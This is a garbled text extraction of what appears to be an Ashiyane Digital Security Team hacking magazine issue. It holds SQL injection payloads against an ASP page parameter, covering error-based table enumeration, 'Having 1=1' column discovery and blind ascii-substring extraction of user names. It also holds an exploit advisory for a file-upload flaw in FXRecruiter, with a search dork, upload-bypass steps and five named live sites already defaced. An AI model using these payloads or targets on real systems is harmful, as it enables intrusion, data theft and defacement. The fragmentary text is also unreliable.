- zanjan university of medical scienceszums.ac.ir/files/it/pages/ashiyane_mag_no4.pdfashiyane...
TRANSCRIPT
www.ashiyane.org
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
www.site.com/news.asp?id=@@Version
www.site.com/news.asp?id=(Select Name
From SysObject Where Xtype=’U’)
Microsoft OLE DB Provider for ODBC Driverserror ‘80004005’
[Microsoft][ODBC SQL Server Driver][SQLServer]Subquery returned more than 1 value.This is not permitted when the subqueryfollows =, !=, <, <= , >, >= or when thesubquery is used as an expression
Select Top 1 Name From SysObjects Where
Xtype=’U’
Ashiyane Digital Security Team
news.asp?id=(Select Top 1 Name From
SysObject Where Xtype=’U’ And Name Not In
(‘User’))
www.site.com/news.asp?id=2 Having 1=1
Microsoft OLE DB Provider for ODBC Driverserror ‘80040e14’
[Microsoft][ODBC SQL Server Driver][SQLServer]Column ‘dbo. MeetingDetails.id ‘ isinvalid in the select list because it is notcontained in an aggregate function and thereis no GROUP BY clause.
www.site.com/news.asp?id=2 Group By id
Having 1=1www.site.com/news.asp?id=5 And
SubString(@@version,1,1)=5
www.site.com/news.asp?id=5 And 5=5
Ashiyane Digital Security Team
news.asp?id=5 And (Select SubString
(Concat(1,Column-name),1,1)FRom
Table_Name Limit 0,1)=1
<And ascii (SubString((Select
Concat(Column_Name) From Table_Name
Limit 0,1),1,1))><Char
And ascii (SubString((Select
Concat(User_Name) From Users Limit
0,1),1,1)) > 98
news.asp?id=5 And ( Select 1 From
Table_Name Limit 0,1)=1
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
http://cloud.github.com/downloads/easyphp/easyphp/EasyPHP-5.3.6.0-setup.exe
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
www.wampserver.com/en/
mysql , mssql , oracle , msql , postgresql
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
=======================================================================# FXRecruiter Arbitary File Upload Vulnerability=======================================================================# Name: FXRecruiter Arbitary File Upload Vulnerability
# Vendor: http://www.fxrecruiter.co.uk & http://www.reversedelta.com
# Risk: High
# Date: 2011-03-27
# Author: Ashiyane Digital Security Team
# Contact: XroGuE_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org/forums/
# Gr33tz: Behrooz_Ice,Virangar,And All Ashiyane Members !
==========================================================================
[+] Dork: intext:”Powered by FXRecruiter” & inurl:”page.php?page=*.php”
==========================================================================[+] Note : You must Register at site, Then in “Upload CV Field” Select and
[-] Upload Your File, then Using “Live Http Header” Change ur File Format To Etc ...
[+] Uploaded path: http://127.0.0.1/fxmodules/resumes/[Your File].*
[+] Demo1: http://www.resourcing-solutions.com/fxmodules/resumes/haha_ehehe.html
[+] Demo2: http://www.energyintoenergy.com/fxmodules/resumes/p3rsi4n_hack3r_xrogue1.html
[+] Demo3: http://peoplemarketing.co.uk/fxmodules/resumes/black_xrogue.html
[+] Demo4: http://www.charles-hunter.com/fxmodules/resumes/black_hat_xrogue.html
[+] Demo5: http://www.activesolutionsrecruitment.com/fxmodules/resumes/black_hat_xrogue.html==========================================================================
# Why I Put 5 Demo Site ????
* For Some People That Think my Report’s Is Fake or not AVAILABLE At Net... !!! :-l
$ Need Live Video ??? : ~>
Video : http://www.vimeo.com/21464321
Video http://www.4shared.com/file/AIwSyKn-/FXRecruiter_Arbitary_File_Uplo.html
==========================================================================[+] Taghdim be Baxe Ashiyane, Happy New Year... omidVaram Sale KHoobi dashte bashin ![+] Discovered By XroGuE !!!
BUG
Ashiyane Digital Security Team
Zone-HZone-H
http://zone-h.org/stats/notifierspecial
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team